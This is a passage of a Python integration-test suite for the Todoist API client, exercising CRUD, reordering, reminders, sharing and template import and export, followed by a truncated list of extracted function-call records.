assert 2 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project1['id']
]
assert 1 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project2['id']
]
project1.delete()
api.commit()
project2.delete()
api.commit()
def test_item_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
response = api.add_item('Item1')
assert response['content'] == 'Item1'
api.sync()
assert 'Item1' in [i['content'] for i in api.state['items']]
item1 = [i for i in api.state['items'] if i['content'] == 'Item1'][0]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.sync()
item1.delete()
response = api.commit()
assert response['items'][0]['id'] == item1['id']
assert response['items'][0]['is_deleted'] == 1
assert 'Item1' not in [i['content'] for i in api.state['items']]
def test_item_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item1.update(content='UpdatedItem1')
response = api.commit()
assert response['items'][0]['content'] == 'UpdatedItem1'
assert 'UpdatedItem1' in [i['content'] for i in api.state['items']]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 1
assert 1 in [
i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_uncomplete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.uncomplete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 0
assert 0 in [
i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 1
assert 1 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
api.commit()
item2.unarchive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 0
assert 0 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_move_to_project(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
project1 = api.projects.add('Project1')
api.commit()
item1.move(project_id=project1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item1'
assert response['items'][0]['project_id'] == project1['id']
assert project1['id'] in [
i['project_id'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
project1.delete()
api.commit()
def test_item_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
item2.move(parent_id=item1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['parent_id'] == item1['id']
assert item1['id'] in [
i['parent_id'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_date_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'every day'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
new_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
due = {
'date': new_date_utc,
'string': 'every day',
}
api.items.update_date_complete(item1['id'], due=due)
response = api.commit()
assert response['items'][0]['due']['string'] == 'every day'
assert 'every day' in [
i['due']['string'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
def test_item_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.reorder(items=[
{'id': item1['id'], 'child_order': 2},
{'id': item2['id'], 'child_order': 1},
])
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['child_order'] == 2
if item['id'] == item2['id']:
assert item['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['items']
if p['id'] == item1['id']
]
assert 1 in [
p['child_order'] for p in api.state['items']
if p['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_day_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.update_day_orders({item1['id']: 1, item2['id']: 2})
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['day_order'] == 1
if item['id'] == item2['id']:
assert item['day_order'] == 2
assert 1 == api.state['day_orders'][str(item1['id'])]
assert 2 == api.state['day_orders'][str(item2['id'])]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_label_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
response = api.commit()
assert response['labels'][0]['name'] == 'Label1'
assert 'Label1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.delete()
response = api.commit()
assert response['labels'][0]['id'] == label1['id']
assert response['labels'][0]['is_deleted'] == 1
assert 'Label1' not in [l['name'] for l in api.state['labels']]
def test_label_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.update(name='UpdatedLabel1')
response = api.commit()
assert response['labels'][0]['name'] == 'UpdatedLabel1'
assert 'UpdatedLabel1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label2 = api.labels.add('Label2')
api.commit()
api.labels.update_orders({label1['id']: 1, label2['id']: 2})
response = api.commit()
for label in response['labels']:
if label['id'] == label1['id']:
assert label['item_order'] == 1
if label['id'] == label2['id']:
assert label['item_order'] == 2
assert 1 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label1['id']
]
assert 2 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label2['id']
]
label1.delete()
api.commit()
label2.delete()
api.commit()
def test_note_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
response = api.commit()
assert response['notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['notes'][0]['id'] == note1['id']
assert response['notes'][0]['is_deleted'] == 1
assert 'Note1' not in [n['content'] for n in api.state['notes']]
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_projectnote_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_projectnote_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['project_notes'][0]['id'] == note1['id']
assert response['project_notes'][0]['is_deleted'] == 1
assert 'Note1' not in [
n['content'] for n in api.state['project_notes']
]
project1.delete()
api.commit()
def test_projectnote_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_filter_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
response = api.commit()
assert response['filters'][0]['name'] == 'Filter1'
assert 'Filter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.delete()
response = api.commit()
assert response['filters'][0]['id'] == filter1['id']
assert response['filters'][0]['is_deleted'] == 1
assert 'Filter1' not in [p['name'] for p in api.state['filters']]
def test_filter_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.update(name='UpdatedFilter1')
response = api.commit()
assert response['filters'][0]['name'] == 'UpdatedFilter1'
assert 'UpdatedFilter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter2 = api.filters.add('Filter2', 'today')
api.commit()
api.filters.update_orders({filter1['id']: 2, filter2['id']: 1})
response = api.commit()
for filter in response['filters']:
if filter['id'] == filter1['id']:
assert filter['item_order'] == 2
if filter['id'] == filter2['id']:
assert filter['item_order'] == 1
assert 2 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter1['id']
]
assert 1 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter2['id']
]
filter1.delete()
api.commit()
filter2.delete()
api.commit()
def test_reminder_relative_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 30
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_relative_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.delete()
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
api.commit()
def test_reminder_relative_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.update(minute_offset=str(15))
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 15
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
tomorrow = time.gmtime(time.time() + 24 * 3600)
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
api.reminders.delete(reminder1['id'])
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
response = api.commit()
def test_reminder_absolute_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
tomorrow = time.gmtime(now + 24 * 3600 + 60)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
api.reminders.update(reminder1['id'], due_date_utc=due_date_utc)
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_locations(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.locations.clear()
api.commit()
assert api.state['locations'] == []
def test_live_notifications(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.live_notifications.set_last_read(
api.state['live_notifications_last_read_id'])
response = api.commit()
assert response['live_notifications_last_read_id'] == \
api.state['live_notifications_last_read_id']
def test_share_accept(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation1 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation1 is not None
assert invitation1['project_name'] == project1['name']
assert invitation1['from_user']['email'] == api.state['user']['email']
api2.invitations.accept(invitation1['id'],
invitation1['invitation_secret'])
response2 = api2.commit()
assert api2.state['user']['id'] in \
[p['user_id'] for p in api2.state['collaborator_states']]
api.sync()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_reject(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation2 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation2 is not None
assert invitation2['project_name'] == project1['name']
assert invitation2['from_user']['email'] == api.state['user']['email']
api2.invitations.reject(invitation2['id'],
invitation2['invitation_secret'])
response2 = api2.commit()
assert len(response2['projects']) == 0
assert len(response2['collaborator_states']) == 0
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_delete(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation3 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation3 is not None
assert invitation3['project_name'] == project1['name']
assert invitation3['from_user']['email'] == api.state['user']['email']
api.invitations.delete(invitation3['id'])
api.commit()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_templates(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
project2 = api.projects.add('Project2')
api.commit()
item1 = api.items.add('Item1', project_id=project1['id'])
api.commit()
template = api.templates.export_as_file(project1['id'])
assert 'task,Item1,4,1' in template
with io.open('/tmp/example.csv', 'w', encoding='utf-8') as example:
example.write(template)
result = api.templates.import_into_project(project1['id'],
'/tmp/example.csv')
assert result == {'status': u'ok'}
item1.delete()
api.commit()
project1.delete()
api.commit()
project2.delete()
api.commit()
| [((8, 10, 8, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(8, 33, 8, 42): 'api_token', (8, 44, 8, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((17, 10, 17, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(17, 33, 17, 42): 'api_token', (17, 44, 17, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((31, 10, 31, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(31, 33, 31, 42): 'api_token', (31, 44, 31, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((44, 10, 44, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(44, 33, 44, 42): 'api_token', (44, 44, 44, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((58, 10, 58, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(58, 33, 58, 42): 'api_token', (58, 44, 58, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((72, 10, 72, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(72, 33, 72, 42): 'api_token', (72, 44, 72, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((89, 10, 89, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(89, 33, 89, 42): 'api_token', (89, 44, 89, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((110, 10, 110, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(110, 33, 110, 42): 'api_token', (110, 44, 110, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((133, 10, 133, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(133, 33, 133, 42): 'api_token', (133, 44, 133, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((157, 10, 157, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(157, 33, 157, 42): 'api_token', (157, 44, 157, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((192, 10, 192, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(192, 33, 192, 42): 'api_token', (192, 44, 192, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((207, 10, 207, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(207, 33, 207, 42): 'api_token', (207, 44, 207, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((221, 10, 221, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(221, 33, 221, 42): 'api_token', (221, 44, 221, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((238, 10, 238, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(238, 33, 238, 42): 'api_token', (238, 44, 238, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((261, 10, 261, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(261, 33, 261, 42): 'api_token', (261, 44, 261, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((286, 10, 286, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(286, 33, 286, 42): 'api_token', (286, 44, 286, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((311, 10, 311, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(311, 33, 311, 42): 'api_token', (311, 44, 311, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((338, 10, 338, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(338, 
33, 338, 42): 'api_token', (338, 44, 338, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((361, 10, 361, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(361, 33, 361, 42): 'api_token', (361, 44, 361, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((384, 10, 384, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(384, 33, 384, 42): 'api_token', (384, 44, 384, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((390, 10, 390, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((391, 15, 391, 43), 'time.gmtime', 'time.gmtime', ({(391, 27, 391, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((392, 19, 392, 64), 'time.strftime', 'time.strftime', ({(392, 33, 392, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (392, 55, 392, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((409, 10, 409, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(409, 33, 409, 42): 'api_token', (409, 44, 409, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((443, 10, 443, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(443, 33, 443, 42): 'api_token', (443, 44, 443, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((469, 10, 469, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(469, 33, 469, 42): 'api_token', (469, 44, 469, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((483, 10, 483, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(483, 33, 483, 42): 'api_token', (483, 44, 483, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((497, 10, 497, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(497, 33, 497, 42): 'api_token', (497, 44, 497, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((514, 10, 514, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(514, 33, 514, 42): 'api_token', (514, 44, 514, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((543, 10, 543, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(543, 33, 543, 42): 'api_token', (543, 44, 543, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((562, 10, 562, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(562, 33, 562, 42): 'api_token', (562, 44, 562, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((583, 10, 583, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(583, 33, 583, 42): 'api_token', (583, 44, 583, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((604, 10, 604, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(604, 33, 604, 42): 'api_token', (604, 44, 604, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((623, 10, 623, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(623, 33, 623, 42): 'api_token', (623, 44, 623, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((644, 10, 644, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(644, 33, 644, 42): 'api_token', (644, 44, 644, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((665, 10, 665, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(665, 33, 665, 42): 
'api_token', (665, 44, 665, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((679, 10, 679, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(679, 33, 679, 42): 'api_token', (679, 44, 679, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((693, 10, 693, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(693, 33, 693, 42): 'api_token', (693, 44, 693, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((710, 10, 710, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(710, 33, 710, 42): 'api_token', (710, 44, 710, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((742, 10, 742, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(742, 33, 742, 42): 'api_token', (742, 44, 742, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((761, 10, 761, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(761, 33, 761, 42): 'api_token', (761, 44, 761, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((779, 10, 779, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(779, 33, 779, 42): 'api_token', (779, 44, 779, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((800, 10, 800, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(800, 33, 800, 42): 'api_token', (800, 44, 800, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((806, 10, 806, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((807, 15, 807, 43), 'time.gmtime', 'time.gmtime', ({(807, 